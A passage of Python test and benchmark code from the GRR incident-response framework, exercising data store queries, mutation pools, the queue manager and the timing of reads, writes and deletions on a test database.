value = "value_%d" % value_idx
value_idx += 1
data_store.DB.Set(subject, attribute, value, token=self.token)
# ResolvePrefix.
for limit in [1, 2, 5, 10, 100]:
results = data_store.DB.ResolvePrefix(
subjects[0], "metadata:", limit=limit, token=self.token)
self.assertEqual(len(results), min(limit, 10))
# MultiResolvePrefix.
for limit in [1, 2, 5, 9, 10, 11, 25, 100, 120]:
results = dict(
data_store.DB.MultiResolvePrefix(
subjects, "metadata:", limit=limit, token=self.token))
all_results = []
for subect_res in results.itervalues():
all_results.extend(subect_res)
self.assertEqual(len(all_results), min(limit, 100))
for limit in [1, 2, 5, 9, 10, 11, 25]:
results = dict(
data_store.DB.MultiResolvePrefix(
subjects, "metadata:limittest_7", limit=limit, token=self.token))
all_results = []
for subect_res in results.itervalues():
all_results.extend(subect_res)
self.assertEqual(len(all_results), min(limit, 10))
# ResolveMulti.
for limit in [1, 2, 5, 9, 10, 11, 25]:
results = list(
data_store.DB.ResolveMulti(
subjects[2], attributes, limit=limit, token=self.token))
self.assertEqual(len(results), min(limit, 10))
def testApi(self):
api = [
"DeleteAttributes", "MultiDeleteAttributes", "DeleteSubject",
"DeleteSubjects", "MultiResolvePrefix", "MultiSet", "Resolve",
"ResolveMulti", "ResolvePrefix", "ScanAttribute", "ScanAttributes",
"Set", "DBSubjectLock", "CreateNotifications", "DeleteNotifications",
"GetNotifications"
]
implementation = data_store.DB
reference = data_store.DataStore
for f in api:
implementation_spec = inspect.getargspec(getattr(implementation, f))
reference_spec = inspect.getargspec(getattr(reference, f))
self.assertEqual(implementation_spec, reference_spec,
"Signatures for function %s not matching: \n%s !=\n%s" %
(f, implementation_spec, reference_spec))
@DeletionTest
def testPoolDeleteSubjects(self):
predicate = "metadata:predicate"
data_store.DB.Set(self.test_row, predicate, "hello", token=self.token)
# Check it's there.
stored, _ = data_store.DB.Resolve(
self.test_row, predicate, token=self.token)
self.assertEqual(stored, "hello")
pool = data_store.DB.GetMutationPool(token=self.token)
pool.DeleteAttributes(self.test_row, [predicate])
# Check it's still there.
stored, _ = data_store.DB.Resolve(
self.test_row, predicate, token=self.token)
self.assertEqual(stored, "hello")
pool.Flush()
# Now it should be gone.
stored, _ = data_store.DB.Resolve(
self.test_row, predicate, token=self.token)
self.assertIsNone(stored)
def testPoolMultiSet(self):
pool = data_store.DB.GetMutationPool(token=self.token)
unicode_string = u"this is a uñîcödé string"
pool.MultiSet(self.test_row, {
"aff4:size": [1],
"aff4:stored": [unicode_string],
"aff4:unknown_attribute": ["hello"]
})
# Nothing is written before Flush() is called.
stored, _ = data_store.DB.Resolve(
self.test_row, "aff4:size", token=self.token)
self.assertIsNone(stored)
stored, _ = data_store.DB.Resolve(
self.test_row, "aff4:stored", token=self.token)
self.assertIsNone(stored)
# Flush.
pool.Flush()
stored, _ = data_store.DB.Resolve(
self.test_row, "aff4:size", token=self.token)
self.assertEqual(stored, 1)
stored, _ = data_store.DB.Resolve(
self.test_row, "aff4:stored", token=self.token)
self.assertEqual(stored, unicode_string)
# Make sure that unknown attributes are stored as bytes.
stored, _ = data_store.DB.Resolve(
self.test_row, "aff4:unknown_attribute", token=self.token)
self.assertEqual(stored, "hello")
self.assertEqual(type(stored), str)
@DeletionTest
def testPoolDeleteAttributes(self):
predicate = "metadata:predicate"
pool = data_store.DB.GetMutationPool(token=self.token)
data_store.DB.Set(self.test_row, predicate, "hello", token=self.token)
# Check it's there.
stored, _ = data_store.DB.Resolve(
self.test_row, predicate, token=self.token)
self.assertEqual(stored, "hello")
pool.DeleteAttributes(self.test_row, [predicate])
# Check it's still there.
stored, _ = data_store.DB.Resolve(
self.test_row, predicate, token=self.token)
self.assertEqual(stored, "hello")
pool.Flush()
stored, _ = data_store.DB.Resolve(
self.test_row, predicate, token=self.token)
self.assertIsNone(stored)
def testQueueManager(self):
session_id = rdfvalue.SessionID(flow_name="test")
client_id = rdf_client.ClientURN("C.1000000000000000")
request = rdf_flows.RequestState(
id=1,
client_id=client_id,
next_state="TestState",
session_id=session_id)
with queue_manager.QueueManager(token=self.token) as manager:
manager.QueueRequest(request)
# We only have one unanswered request on the queue.
all_requests = list(manager.FetchRequestsAndResponses(session_id))
self.assertEqual(len(all_requests), 1)
self.assertEqual(all_requests[0], (request, []))
# FetchCompletedRequests should return nothing now.
self.assertEqual(list(manager.FetchCompletedRequests(session_id)), [])
# Now queue more requests and responses:
with queue_manager.QueueManager(token=self.token) as manager:
# Start with request 2 - leave request 1 un-responded to.
for request_id in range(2, 5):
request = rdf_flows.RequestState(
id=request_id,
client_id=client_id,
next_state="TestState",
session_id=session_id)
manager.QueueRequest(request)
response_id = None
for response_id in range(1, 10):
# Normal message.
manager.QueueResponse(
rdf_flows.GrrMessage(
session_id=session_id,
request_id=request_id,
response_id=response_id))
# And a status message.
manager.QueueResponse(
rdf_flows.GrrMessage(
session_id=session_id,
request_id=request_id,
response_id=response_id + 1,
type=rdf_flows.GrrMessage.Type.STATUS))
completed_requests = list(manager.FetchCompletedRequests(session_id))
self.assertEqual(len(completed_requests), 3)
# First completed message is request_id = 2 with 10 responses.
self.assertEqual(completed_requests[0][0].id, 2)
# Last message is the status message.
self.assertEqual(completed_requests[0][-1].type,
rdf_flows.GrrMessage.Type.STATUS)
self.assertEqual(completed_requests[0][-1].response_id, 10)
# Now fetch all the completed responses. Set the limit so we only fetch some
# of the responses.
completed_response = list(manager.FetchCompletedResponses(session_id))
self.assertEqual(len(completed_response), 3)
for i, (request, responses) in enumerate(completed_response, 2):
self.assertEqual(request.id, i)
self.assertEqual(len(responses), 10)
# Now check if the limit is enforced. The limit refers to the total number
# of responses to return. We ask for maximum 15 responses, so we should get
# a single request with 10 responses (since 2 requests will exceed the
# limit).
more_data = False
i = 0
try:
partial_response = manager.FetchCompletedResponses(session_id, limit=15)
for i, (request, responses) in enumerate(partial_response, 2):
self.assertEqual(request.id, i)
self.assertEqual(len(responses), 10)
except queue_manager.MoreDataException:
more_data = True
# Returns the first request that is completed.
self.assertEqual(i, 3)
# Make sure the manager told us that more data is available.
self.assertTrue(more_data)
with queue_manager.QueueManager(token=self.token) as manager:
manager.QueueNotification(
rdf_flows.GrrNotification(session_id=session_id, timestamp=100))
stored_notifications = manager.GetNotificationsForAllShards(
session_id.Queue())
self.assertEqual(len(stored_notifications), 1)
class DataStoreCSVBenchmarks(test_lib.MicroBenchmarks):
"""Long running benchmarks where the results are dumped to a CSV file.
These tests are deliberately not named with the test prefix, since they need
to be run individually to get true performance data. Run by specifying the
testname with --test and setting --labels=benchmark.
The CSV output filename will be printed in a log message at the end of the
test.
"""
labels = ["large"]
# What we consider as a big number of attributes.
BIG_NUM_ATTRIBUTES = 1000
units = "s"
# Database counters.
subjects = 0
predicates = 0
values = 0
queries_total = 0 # Total queries.
queries_last_timestep = 0 # Number of the queries up to the last timestep.
steps = 0 # How many steps so far.
query_interval = 3000 # A step is composed of this many queries.
test_name = "" # Current operation being run.
start_time = None
last_time = None
predicate_template = "task:flow%d"
def setUp(self):
super(DataStoreCSVBenchmarks, self).setUp(
["DB Size (KB)", "Queries", "Subjects", "Predicates",
"Values"], ["<20", "<10", "<10", "<10", "<10"])
self.InitDatastore()
self.start_time = time.time()
self.last_time = self.start_time
def tearDown(self):
self.Register(force=True)
super(DataStoreCSVBenchmarks, self).tearDown()
self.WriteCSV()
self.DestroyDatastore()
def Register(self, force=False):
"""Add a new result line to the benchmark result."""
self.queries_total += 1
if self.queries_total % self.query_interval == 0 or force:
data_store.DB.Flush()
this_time = time.time()
queries_diff = self.queries_total - self.queries_last_timestep
self.queries_last_timestep = self.queries_total
self.last_time = this_time
self.steps += 1
self.AddResult(self.test_name, this_time - self.start_time, self.steps,
data_store.DB.Size() / 1024, queries_diff, self.subjects,
self.predicates, self.values)
def WriteCSV(self, remove=False):
"""Write results to a CSV file."""
with tempfile.NamedTemporaryFile(suffix=".csv", delete=False) as fp:
writer = csv.writer(fp, delimiter=" ")
writer.writerow([
"Benchmark", "Time", "DBSize", "Queries", "Subjects", "Predicates",
"Values"
])
for row in self.scratchpad[2:]:
writer.writerow(
[row[0], row[1], row[3], row[4], row[5], row[6], row[7]])
logging.info("CSV File is in %s", fp.name)
if remove:
os.unlink(fp.name)
def _RandomlyReadSubject(self, subject, predicates):
"""Read certain parts of a given subject."""
for j, timestamps in predicates.items():
which = self.rand.randint(0, 2)
if which == 0:
# Read all timestamps.
data_store.DB.ResolveMulti(
subject, [self.predicate_template % j],
timestamp=data_store.DB.ALL_TIMESTAMPS,
token=self.token)
elif which == 1:
# Read a specific timestamp.
if timestamps:
ts = self.rand.choice(timestamps)
data_store.DB.ResolveMulti(
subject, [self.predicate_template % j],
timestamp=(ts, ts),
token=self.token)
elif which == 2:
# Read latest.
data_store.DB.Resolve(
subject, self.predicate_template % j, token=self.token)
self.Register()
which = self.rand.randint(0, 1)
if which == 0:
# Find all attributes.
data_store.DB.ResolvePrefix(
subject,
"task:flow",
timestamp=data_store.DB.NEWEST_TIMESTAMP,
token=self.token)
elif which == 1:
# Find all attributes with a prefix reducable regex.
data_store.DB.ResolvePrefix(
subject,
"task:",
timestamp=data_store.DB.NEWEST_TIMESTAMP,
token=self.token)
self.Register()
def _ReadRandom(self, subjects, fraction, change_test=True):
"""Randomly read the database."""
if change_test:
self.test_name = "read random %d%%" % fraction
for _ in range(0, int(float(len(subjects)) * float(fraction) / 100.0)):
i = self.rand.choice(subjects.keys())
subject = subjects[i]["name"]
predicates = subjects[i]["attrs"]
self._RandomlyReadSubject(subject, predicates)
def _UpdateRandom(self, subjects, fraction, change_test=True):
"""Update values/predicates for a given fraction of the subjects."""
if change_test:
self.test_name = "update %d%%" % fraction
new_value = os.urandom(100)
for i in subjects:
subject = subjects[i]["name"]
predicates = subjects[i]["attrs"]
if self.rand.randint(0, 100) > fraction:
continue
which = self.rand.randint(0, 2)
if which == 0 or which == 1:
for j, timestamp_info in predicates.items():
number_timestamps = len(timestamp_info)
if which == 0 and len(timestamp_info):
# Update one timestamp'ed value.
data_store.DB.Set(
subject,
self.predicate_template % j,
new_value,
timestamp=timestamp_info[-1],
token=self.token)
self.Register()
elif which == 1:
# Add another timestamp.
timestamp_info.append(100 * number_timestamps + 1)
data_store.DB.Set(
subject,
self.predicate_template % j,
new_value,
replace=False,
timestamp=timestamp_info[-1],
token=self.token)
self.values += 1
self.Register()
elif which == 2:
# Add an extra predicate.
j = len(predicates)
number_timestamps = self.rand.randrange(1, 3)
ts = [100 * (ts + 1) for ts in xrange(number_timestamps)]
predicates[j] = ts
self.values += number_timestamps
self.predicates += 1
values = [(new_value, t) for t in ts]
data_store.DB.MultiSet(
subject, {self.predicate_template % j: values},
replace=False,
timestamp=100,
token=self.token)
self.Register()
data_store.DB.Flush()
def _DeleteRandom(self, subjects, fraction, change_test=True):
"""Delete predicates/subjects/values at random."""
if change_test:
self.test_name = "delete %d%%" % fraction
subjects_to_delete = []
for i, info in subjects.items():
subject = info["name"]
predicates = info["attrs"]
number_predicates = len(predicates)
do_it = (self.rand.randint(0, 100) <= fraction)
which = self.rand.randint(0, 2)
count_values = 0
predicates_to_delete = []
for j, timestamp_info in predicates.items():
number_timestamps = len(timestamp_info)
count_values += number_timestamps
if do_it:
if which == 0:
# Delete one timestamp'ed value.
if timestamp_info:
ts = timestamp_info[0]
data_store.DB.DeleteAttributes(
subject, [self.predicate_template % j],
start=ts,
end=ts,
token=self.token)
self.values -= 1
timestamp_info.pop(0)
self.Register()
else:
which = 1
if which == 1:
# Delete the attribute itself.
data_store.DB.DeleteAttributes(
subject, [self.predicate_template % j], token=self.token)
self.values -= number_timestamps
self.predicates -= 1
predicates_to_delete.append(j)
self.Register()
if do_it and which == 1:
for j in predicates_to_delete:
del predicates[j]
if do_it and which == 2:
# Delete subject.
data_store.DB.DeleteSubject(subject, token=self.token)
self.predicates -= number_predicates
self.values -= count_values
self.subjects -= 1
subjects_to_delete.append(i)
self.Register()
for i in subjects_to_delete:
del subjects[i]
data_store.DB.Flush()
def _GrowRandomly(self, subjects, fraction, nclients, change_test=True):
"""Adds new clients/subjects to the database."""
if change_test:
self.test_name = "add %d%%" % fraction
how_many = int(float(len(subjects)) * float(fraction) / 100)
new_value = os.urandom(100)
new_subject = max(subjects.iteritems(), key=operator.itemgetter(0))[0] + 1
# Generate client names.
clients = [self._GenerateRandomClient() for _ in xrange(nclients)]
for i in xrange(new_subject, new_subject + how_many):
client = clients[self.rand.randint(0, nclients - 1)]
self._AddNewSubject(client, subjects, i, new_value)
data_store.DB.Flush()
def _GenerateRandomSubject(self):
n = self.rand.randint(1, 5)
seps = [
self._GenerateRandomString(self.rand.randint(5, 10)) for _ in xrange(n)
]
return "/".join(seps)
def _AddNewSubject(self, client, subjects, i, value, max_attributes=3):
"""Add a new subject to the database."""
number_predicates = self.rand.randrange(1, max_attributes)
self.subjects += 1
predicates = dict.fromkeys(xrange(number_predicates))
self.predicates += number_predicates
subject = str(client.Add(self._GenerateRandomSubject()))
for j in xrange(number_predicates):
number_timestamps = self.rand.randrange(1, 3)
self.values += number_timestamps
ts = [100 * (ts + 1) for ts in xrange(number_timestamps)]
predicates[j] = ts
values = [(value, t) for t in ts]
data_store.DB.MultiSet(
subject, {self.predicate_template % j: values},
timestamp=100,
replace=False,
sync=False,
token=self.token)
self.Register()
info = {"name": subject, "attrs": predicates}
subjects[i] = info
def _ReadLinear(self, subjects, fraction):
"""Linearly read subjects from the database."""
self.test_name = "read linear %d%%" % fraction
for i in subjects:
if self.rand.randint(0, 100) > fraction:
return
subject = subjects[i]["name"]
predicates = subjects[i]["attrs"]
self._RandomlyReadSubject(subject, predicates)
def _AddManyAttributes(self, subjects, many):
"""Add lots of predicates to a given number of subjects."""
self.test_name = "add +attrs %d" % many
new_value = os.urandom(100)
for _ in range(0, many):
i = self.rand.choice(subjects.keys())
subject = subjects[i]["name"]
predicates = subjects[i]["attrs"]
how_many = self.rand.randint(self.BIG_NUM_ATTRIBUTES,
self.BIG_NUM_ATTRIBUTES + 1000)
self.predicates += how_many
new_predicate = max(
predicates.iteritems(), key=operator.itemgetter(0))[0] + 1
for j in xrange(new_predicate, new_predicate + how_many):
number_timestamps = self.rand.randrange(1, 3)
ts = [100 * (ts + 1) for ts in xrange(number_timestamps)]
self.values += number_timestamps
values = [(new_value, t) for t in ts]
predicates[j] = ts
data_store.DB.MultiSet(
subject, {self.predicate_template % j: values},
replace=False,
timestamp=100,
sync=False,
token=self.token)
self.Register()
data_store.DB.Flush()
def _RemoveManyAttributes(self, subjects, fraction):
"""Delete all predicates (except 1) from subjects with many predicates."""
self.test_name = "del +attrs %d%%" % fraction
often = 100 / fraction
count = 0
for i in subjects:
subject = subjects[i]["name"]
predicates = subjects[i]["attrs"]
number_predicates = len(predicates)
if number_predicates >= self.BIG_NUM_ATTRIBUTES:
count += 1
if count == often:
count = 0
predicates_to_delete = [j for j in predicates.keys()[1:]]
values_deleted = sum(len(predicates[x]) for x in predicates_to_delete)
self.values -= values_deleted
self.predicates -= len(predicates_to_delete)
for j in predicates_to_delete:
del predicates[j]
data_store.DB.DeleteAttributes(
subject, [self.predicate_template % j],
sync=False,
token=self.token)
self.Register()
data_store.DB.Flush()
def _Wipeout(self, subjects):
"""Delete every subject from the database."""
self.test_name = "wipeout"
for i in subjects:
subject = subjects[i]["name"]
predicates = subjects[i]["attrs"]
number_predicates = len(predicates)
count_values = 0
for j in predicates:
count_values += len(predicates[j])
data_store.DB.DeleteSubject(subject, token=self.token)
self.predicates -= number_predicates
self.values -= count_values
self.subjects -= 1
self.Register()
subjects = {}
data_store.DB.Flush()
def _DoMix(self, subjects):
"""Do a mix of database operations."""
self.test_name = "mix"
for _ in xrange(0, len(subjects) / 2000):
# Do random operations.
op = self.rand.randint(0, 3)
if op == 0:
self._ReadRandom(subjects, 14, False)
elif op == 1:
self._GrowRandomly(subjects, 5, 20, False)
elif op == 2:
self._UpdateRandom(subjects, 10, False)
elif op == 3:
self._DeleteRandom(subjects, 4, False)
def _GenerateRandomClient(self):
return rdf_client.ClientURN("C.%016d" % self.rand.randint(0, (10**16) - 1))
def _FillDatabase(self, nsubjects, nclients, max_attributes=3):
"""Fill the database with a certain number of subjects and clients."""
self.rand = random.Random(0)
self.test_name = "fill"
self.AddResult(self.test_name, 0, self.steps,
data_store.DB.Size(), 0, 0, 0, 0)
subjects = dict.fromkeys(xrange(nsubjects))
value = os.urandom(100)
clients = [self._GenerateRandomClient() for _ in xrange(nclients)]
for i in subjects:
client = self.rand.choice(clients)
self._AddNewSubject(client, subjects, i, value, max_attributes)
data_store.DB.Flush()
return subjects
def _GenerateRandomString(self, chars):
return "".join(
[self.rand.choice(string.ascii_letters) for _ in xrange(chars)])
def _AddBlobs(self, howmany, size):
"""Adds 'howmany' blobs with size 'size' kbs."""
self.test_name = "add blobs %dx%dk" % (howmany, size)
count = 0
often = howmany / 10
for count in xrange(howmany):
data = self._GenerateRandomString(1024 * size)
data_store.DB.StoreBlob(data, token=self.token)
if count % often == 0:
# Because adding blobs, takes too long we force the output of
# new results.
self.Register(force=True)
self.Register(force=True)
data_store.DB.Flush()
@test_lib.SetLabel("benchmark")
def manySubjectsFewAttrs(self):
"""Database with many subjects with few attributes."""
subjects = self._FillDatabase(25000, 500)
self._ReadLinear(subjects, 50)
self._UpdateRandom(subjects, 50)
self._ReadRandom(subjects, 70)
self._DeleteRandom(subjects, 40)
self._GrowRandomly(subjects, 40, 50)
self._ReadRandom(subjects, 100)
self._DoMix(subjects)
self._Wipeout(subjects)
@test_lib.SetLabel("benchmark")
def manySubjectsFewWithManyAttrs(self):
"""Database where a few subjects have many attributes."""
subjects = self._FillDatabase(25000, 500)
self._UpdateRandom(subjects, 50)
self._AddManyAttributes(subjects, 100)
self._ReadRandom(subjects, 30)
# For 1/2 of the subjects with many attributes, remove all but
# one of the attributes.
self._RemoveManyAttributes(subjects, 50)
self._ReadRandom(subjects, 30)
self._UpdateRandom(subjects, 50)
self._Wipeout(subjects)
@test_lib.SetLabel("benchmark")
def fewSubjectsManyAttrs(self):
"""Database with a few subjects with many attributes."""
subjects = self._FillDatabase(100, 5)
self._UpdateRandom(subjects, 100)
self._AddManyAttributes(subjects, 50)
self._ReadRandom(subjects, 30)
self._RemoveManyAttributes(subjects, 50)
self._ReadRandom(subjects, 50)
self._Wipeout(subjects)
@test_lib.SetLabel("benchmark")
def blobs(self):
"""Database that stores blobs of increasing size."""
subjects = self._FillDatabase(10000, 200)
def _ReadUpdate():
self._ReadRandom(subjects, 75)
self._UpdateRandom(subjects, 20)
_ReadUpdate()
self._AddBlobs(50, 512)
_ReadUpdate()
self._AddBlobs(50, 2048)
_ReadUpdate()
self._AddBlobs(50, 10240)
_ReadUpdate()
self._AddBlobs(20, 10240 * 10)
_ReadUpdate()
@test_lib.SetLabel("benchmark")
def manySubjectsManyAttrs(self):
"""Database with many subjects with many attributes."""
subjects = self._FillDatabase(25000, 500, 50)
self._ReadLinear(subjects, 50)
self._UpdateRandom(subjects, 50)
self._ReadRandom(subjects, 50)
self._DeleteRandom(subjects, 40)
self._GrowRandomly(subjects, 40, 50)
self._ReadRandom(subjects, 50)
self._DoMix(subjects)
self._Wipeout(subjects)
class DataStoreBenchmarks(test_lib.MicroBenchmarks):
"""Datastore micro benchmarks.
These tests should be run with --labels=benchmark
"""
queue = rdfvalue.RDFURN("BENCHMARK")
units = "s"
labels = ["large"]
def setUp(self):
super(DataStoreBenchmarks, self).setUp()
self.InitDatastore()
self.tp = threadpool.ThreadPool.Factory("test_pool", 50)
self.tp.Start()
def tearDown(self):
super(DataStoreBenchmarks, self).tearDown()
self.tp.Stop()
self.DestroyDatastore()
def InitDatastore(self):
"""Initiates custom data store."""
def DestroyDatastore(self):
"""Destroys custom data store."""
def GenerateFiles(self, client_id, n, directory="dir/dir"):
res = []
for i in xrange(n):
res.append(
rdf_client.StatEntry(
aff4path="aff4:/%s/fs/os/%s/file%d" % (client_id, directory, i),
st_mode=33261,
st_ino=1026267,
st_dev=51713,
st_nlink=1,
st_uid=0,
st_gid=0,
st_size=60064,
st_atime=1308964274,
st_mtime=1285093975,
st_ctime=1299502221,
st_blocks=128,
st_blksize=4096,
st_rdev=0,
pathspec=rdf_paths.PathSpec(
path="/dir/dir/file%d" % i, pathtype=0)))
return res
def StartFlow(self, client_id):
flow_id = flow.GRRFlow.StartFlow(
client_id=client_id,
flow_name=filesystem.ListDirectory.__name__,
queue=self.queue,
pathspec=rdf_paths.PathSpec(
path="/",
pathtype="OS",),
token=self.token)
self.flow_ids.append(flow_id)
messages = []
for d in range(self.nr_dirs):
messages += self.GenerateFiles(client_id, self.files_per_dir,
"dir/dir%d" % d)
messages.append(rdf_flows.GrrStatus())
with queue_manager.QueueManager(token=self.token) as flow_manager:
for i, payload in enumerate(messages):
msg = rdf_flows.GrrMessage(
session_id=flow_id,
request_id=1,
response_id=1 + i,
auth_state=rdf_flows.GrrMessage.AuthorizationState.AUTHENTICATED,
payload=payload)
if isinstance(payload, rdf_flows.GrrStatus):
msg.type = 1
flow_manager.QueueResponse(msg)
nr_clients = 4
nr_dirs = 4
files_per_dir = 500
def _GenerateRandomString(self, chars):
return "".join(
[self.rand.choice(string.ascii_letters) for _ in xrange(chars)])
# Constants to control the size of testCollections. These numbers run in a
# reasonable amount of time for a unit test [O(20s)] on most data stores.
RECORDS = 5000
RECORD_SIZE = 1000
READ_COUNT = 50
BIG_READ_SIZE = 25
# The sequential collection index is only computed for records 5m old, so we
# write records this far in the past in order to force index creation.
INDEX_DELAY = rdfvalue.Duration("10m")
@test_lib.SetLabel("benchmark")
def testCollections(self):
self.rand = random.Random(42)
#
# Populate and exercise an indexed sequential collection.
#
indexed_collection = aff4.FACTORY.Create(
"aff4:/test_seq_collection",
StringSequentialCollection,
mode="rw",
token=self.token)
start_time = time.time()
for _ in range(self.RECORDS):
indexed_collection.Add(
rdfvalue.RDFString(self._GenerateRandomString(self.RECORD_SIZE)),
timestamp=rdfvalue.RDFDatetime.Now() - self.INDEX_DELAY)
elapsed_time = time.time() - start_time
self.AddResult("Seq. Coll. Add (size %d)" % self.RECORD_SIZE, elapsed_time,
self.RECORDS)
start_time = time.time()
self.assertEqual(len(indexed_collection), self.RECORDS)
elapsed_time = time.time() - start_time
self.AddResult("Seq. Coll. Read to end", elapsed_time, 1)
start_time = time.time()
for _ in range(self.READ_COUNT):
for _ in indexed_collection.GenerateItems(offset=self.rand.randint(
0, self.RECORDS - 1)):
break
elapsed_time = time.time() - start_time
self.AddResult("Seq. Coll. random 1 record reads", elapsed_time,
self.READ_COUNT)
start_time = time.time()
for _ in range(self.READ_COUNT):
count = 0
for _ in indexed_collection.GenerateItems(offset=self.rand.randint(
0, self.RECORDS - self.BIG_READ_SIZE)):
count += 1
if count >= self.BIG_READ_SIZE:
break
elapsed_time = time.time() - start_time
self.AddResult("Seq. Coll. random %d record reads" % self.BIG_READ_SIZE,
elapsed_time, self.READ_COUNT)
start_time = time.time()
for _ in indexed_collection.GenerateItems():
pass
elapsed_time = time.time() - start_time
self.AddResult("Seq. Coll. full sequential read", elapsed_time, 1)
@test_lib.SetLabel("benchmark")
def testSimulateFlows(self):
self.flow_ids = []
self.units = "s"
client_ids = ["C.%016X" % j for j in range(1, self.nr_clients + 1)]
start_time = time.time()
for client_id in client_ids:
self.tp.AddTask(self.StartFlow, (client_id,))
self.tp.Join()
notifications = [
rdf_flows.GrrNotification(session_id=f) for f in self.flow_ids
]
with queue_manager.QueueManager(token=self.token) as manager:
manager.MultiNotifyQueue(notifications)
time_used = time.time() - start_time
self.AddResult("Generate Messages (%d clients, %d files)" %
(self.nr_clients,
self.nr_dirs * self.files_per_dir), time_used, 1)
my_worker = worker.GRRWorker(queues=[self.queue], token=self.token)
start_time = time.time()
while my_worker.RunOnce():
pass
my_worker.thread_pool.Join()
time_used = time.time() - start_time
self.AddResult("Process Messages", time_used, 1)
@test_lib.SetLabel("benchmark")
def testMicroBenchmarks(self):
# Tests run in arbitrary order but for the benchmarks, the order makes a
# difference so we call them all from one test here.
self.n = 1000
self.small_n = self.n / 100
self.units = "ms"
self.BenchmarkWriting()
self.BenchmarkReading()
self.BenchmarkWritingThreaded()
self.BenchmarkReadingThreaded()
self.BenchmarkAFF4Locks()
def BenchmarkWriting(self):
subject_template = "aff4:/row%d"
predicate_template = "task:flow%d"
value = os.urandom(100)
large_value = os.urandom(10 * 1024 * 1024)
start_time = time.time()
for i in xrange(self.n):
data_store.DB.Set(
subject_template % i, "task:flow", value, token=self.token)
data_store.DB.Flush()
end_time = time.time()
self.AddResult("Set rows", (end_time - start_time) / self.n, self.n)
start_time = time.time()
for i in xrange(self.n):
data_store.DB.Set(
"aff4:/somerow", predicate_template % i, value, token=self.token)
data_store.DB.Flush()
end_time = time.time()
self.AddResult("Set attributes", (end_time - start_time) / self.n, self.n)
start_time = time.time()
for i in xrange(self.n):
data_store.DB.Set(
"aff4:/somerow",
"task:someflow",
value,
replace=False,
token=self.token)
data_store.DB.Flush()
end_time = time.time()
self.AddResult("Set versions", (end_time - start_time) / self.n, self.n)
start_time = time.time()
for i in xrange(self.small_n):
data_store.DB.Set(
"aff4:/largerow%d" % i,
"task:largeflow",
large_value,
replace=False,
token=self.token)
data_store.DB.Flush()
end_time = time.time()
self.AddResult("Set large values", (end_time - start_time) / self.small_n,
self.small_n)
def BenchmarkReading(self):
subject_template = "aff4:/row%d"
predicate_template = "task:flow%d"
start_time = time.time()
for i in xrange(self.n):
data_store.DB.Resolve(subject_template % i, "task:flow", token=self.token)
data_store.DB.Flush()
end_time = time.time()
self.AddResult("Get rows", (end_time - start_time) / self.n, self.n)
start_time = time.time()
for i in xrange(self.n):
data_store.DB.Resolve(
"aff4:/somerow", predicate_template % i, token=self.token)
data_store.DB.Flush()
end_time = time.time()
self.AddResult("Get attributes", (end_time - start_time) / self.n, self.n)
start_time = time.time()
for i in xrange(self.small_n):
data_store.DB.ResolvePrefix(
"aff4:/somerow",
"task:someflow",
timestamp=data_store.DB.ALL_TIMESTAMPS,
token=self.token)
data_store.DB.Flush()
end_time = time.time()
self.AddResult("Get all versions", (end_time - start_time) / self.small_n,
self.small_n)
start_time = time.time()
for i in xrange(self.small_n):
res = data_store.DB.ResolvePrefix(
"aff4:/largerow%d" % i,
"task:largeflow",
timestamp=data_store.DB.ALL_TIMESTAMPS,
token=self.token)
self.assertEqual(len(res), 1)
self.assertEqual(len(res[0][1]), 10 * 1024 * 1024)
data_store.DB.Flush()
end_time = time.time()
self.AddResult("Get large values", (end_time - start_time) / self.small_n,
self.small_n)
def BenchmarkWritingThreaded(self):
subject_template = "aff4:/threadedrow%d"
predicate_template = "task:threadedflow%d"
value = os.urandom(100)
large_value = os.urandom(10 * 1024 * 1024)
start_time = time.time()
for i in xrange(self.n):
self.tp.AddTask(data_store.DB.Set,
(subject_template % i, "task:threadedflow", value, None,
self.token))
self.tp.Join()
data_store.DB.Flush()
end_time = time.time()
self.AddResult("Multithreaded: Set rows", (end_time - start_time) / self.n,
self.n)
start_time = time.time()
for i in xrange(self.n):
self.tp.AddTask(data_store.DB.Set,
("aff4:/somerowthreaded", predicate_template % i, value,
None, self.token))
self.tp.Join()
data_store.DB.Flush()
end_time = time.time()
self.AddResult("Multithreaded: Set attributes",
(end_time - start_time) / self.n, self.n)
start_time = time.time()
for i in xrange(self.n):
self.tp.AddTask(data_store.DB.Set,
("aff4:/somerowthreaded", "task:someflowthreaded", value,
None, self.token, False))
self.tp.Join()
data_store.DB.Flush()
end_time = time.time()
self.AddResult("Multithreaded: Set versions",
(end_time - start_time) / self.n, self.n)
start_time = time.time()
for i in xrange(self.small_n):
self.tp.AddTask(data_store.DB.Set,
("aff4:/threadedlargerow%d" % i, "task:largeflowthreaded",
large_value, None, self.token, False))
self.tp.Join()
data_store.DB.Flush()
end_time = time.time()
self.AddResult("Multithreaded: Set large values",
(end_time - start_time) / self.small_n, self.small_n)
def ResolvePrefixAndCheck(self, subject, predicate, expected_items=1000):
res = data_store.DB.ResolvePrefix(
subject,
predicate,
token=self.token,
timestamp=data_store.DB.ALL_TIMESTAMPS)
self.assertEqual(len(list(res)), expected_items)
def BenchmarkReadingThreaded(self):
subject_template = "aff4:/threadedrow%d"
predicate_template = "task:threadedflow%d"
start_time = time.time()
for i in xrange(self.n):
self.tp.AddTask(data_store.DB.Resolve, (subject_template % i,
"task:threadedflow", self.token))
self.tp.Join()
data_store.DB.Flush()
end_time = time.time()
self.AddResult("Multithreaded: Get rows", (end_time - start_time) / self.n,
self.n)
start_time = time.time()
for i in xrange(self.n):
self.tp.AddTask(data_store.DB.Resolve,
("aff4:/somerowthreaded", predicate_template % i,
self.token))
self.tp.Join()
data_store.DB.Flush()
end_time = time.time()
self.AddResult("Multithreaded: Get attributes",
(end_time - start_time) / self.n, self.n)
start_time = time.time()
for i in xrange(self.small_n):
self.tp.AddTask(self.ResolvePrefixAndCheck, ("aff4:/somerowthreaded",
"task:someflowthreaded"))
self.tp.Join()
data_store.DB.Flush()
end_time = time.time()
self.AddResult("Multithreaded: Get all versions",
(end_time - start_time) / self.small_n, self.small_n)
start_time = time.time()
for i in xrange(self.small_n):
self.tp.AddTask(self.ResolvePrefixAndCheck,
("aff4:/threadedlargerow%d" % i, "task:largeflowthreaded",
1))
self.tp.Join()
data_store.DB.Flush()
end_time = time.time()
self.AddResult("Multithreaded: Get large values",
(end_time - start_time) / self.small_n, self.small_n)
def BenchmarkAFF4Locks(self):
self.client_id = "C.%016X" % 999
# Write some data to read.
client = aff4.FACTORY.Create(
self.client_id, aff4_grr.VFSGRRClient, mode="w", token=self.token)
client.Set(client.Schema.HOSTNAME("client1"))
client.Close()
cl = aff4.FACTORY.Open(self.client_id, token=self.token)
